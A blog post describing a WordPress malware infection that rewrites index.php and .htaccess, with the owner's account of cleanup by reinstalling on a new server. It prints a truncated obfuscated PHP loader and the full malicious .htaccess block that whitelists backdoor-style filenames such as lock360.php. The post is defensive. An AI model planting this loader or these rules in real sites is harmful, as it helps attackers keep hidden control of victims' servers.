Home Experience & Tips Sharing Standard Post

Standard Post

A Case of WordPress Website .htaccess File Virus Infection

Today I encountered a relatively powerful virus that automatically infects index.php and .htaccess files in the website directory. After infection, the website cannot be opened. Other impacts are unclear. Here I record the virus analysis and solution. Virus details: First, a large string of encrypted code is inserted into the index.php file: ...

Updated on June 1, 2021 About 3 minutes reading

Today, I encountered a rather potent virus that automatically infects files like index.php and .htaccess in the website directory. After infection, the website becomes inaccessible. The other impacts are unclear. Here, I'll document the virus analysis and solution.

 

Details of the virus:

First, a large chunk of encrypted code is inserted into the index.php file:

<php
$O_O_O_0O00=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$O0_0O__0OO=$O_O_O_0O00[44].$O_O_O_0O00[53].$O_O_O_0O00[31].$O_O_O_0O00[65].$O_O_O_0O00[10].$O_O_O_0O00[53].$O_O_O_0O00[31].$O_O_O_0O00[44].$O_O_O_0O00[39].$O_O_O_0O00[21].$O_O_O_0O00[56].$O_O_O_0O00[31].$O_O_O_0O00[10].$O_O_O_0O00[56].$O_O_O_0O00[21

Then, the .htaccess file is consistently altered to look like the following:

<FilesMatch ".(py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

The website infected by this virus uses a cPanel virtual host. Strangely, after I deleted all files in the root directory and refreshed, virus files were still automatically generated. The reason is unknown, so I directly replaced it with another server for installation, and everything returned to normal.

From information found on the WordPress official forum, this virus has been encountered by some people for a few months, but there is no clear solution. Fortunately, this virus does not infect the database, so reinstalling WordPress can eliminate this virus (you may also need to reinstall the server system or change to a different server).

Additionally, there is a method online that I haven't tested: first stop the PHP process, then delete the infected files, then restart PHP. You can give it a try.

5/5 - (2 votes)
Previous How to Add Google Analytics Code to a Foreign Trade Website Built with the Free Version of Astra Continue reading content around the same timeline. Next How to Add Related Posts in Astra Theme View the next related tutorial or experience.

AI Website Building Assistant

🤖
Hello! I am the Naibabiji AI Assistant. How can I help you?
Quick Consultation: